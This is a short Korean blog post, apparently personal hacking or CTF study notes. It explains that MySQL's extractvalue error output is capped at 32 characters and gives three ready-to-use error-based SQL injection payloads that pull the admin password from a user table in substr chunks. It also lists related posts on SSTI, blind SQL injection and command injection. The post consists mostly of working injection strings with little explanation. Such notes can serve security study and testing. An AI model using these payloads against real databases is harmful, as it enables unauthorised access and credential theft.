본문 바로가기

mysql error based injection 잘 되어 있는 곳

https://johyungen.tistory.com/408

 

MySQL Error(Double Query, XML 내장함수) SQLi (rand(), floor(), limit, offset, ifnull, extractvalue(), updatexml())

소스코드 1 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 <?php if(!$link = mysql_connect('localhost', 'root', 'root')) {         echo 'Could not..

johyungen.tistory.com

 

extractvalue와 같은 xml 내장함수의 경우 에러 출력시 32글자 제한이 있기에 substr과 같은 함수로 출력되는값을 잘 나누어 값을 얻어낸다.

admin' and extractvalue(1,concat(0x3a,substr((select upw from user where uid='admin'),1,32)));#

admin' and extractvalue(1,concat(0x3a,substr((select upw from user where uid='admin'),33,32)));#

admin' and extractvalue(1,concat(0x3a,substr((select upw from user where uid='admin'),16,32)));#

 

'' 카테고리의 다른 글

SSTI 문서  (0) 2022.06.23
node-redis Bug case  (1) 2022.06.20
한글 blind sqlinjection  (0) 2022.06.13
python flask debugger pin취약점 문제  (0) 2022.06.08
Blind OS Command Injection  (1) 2022.05.27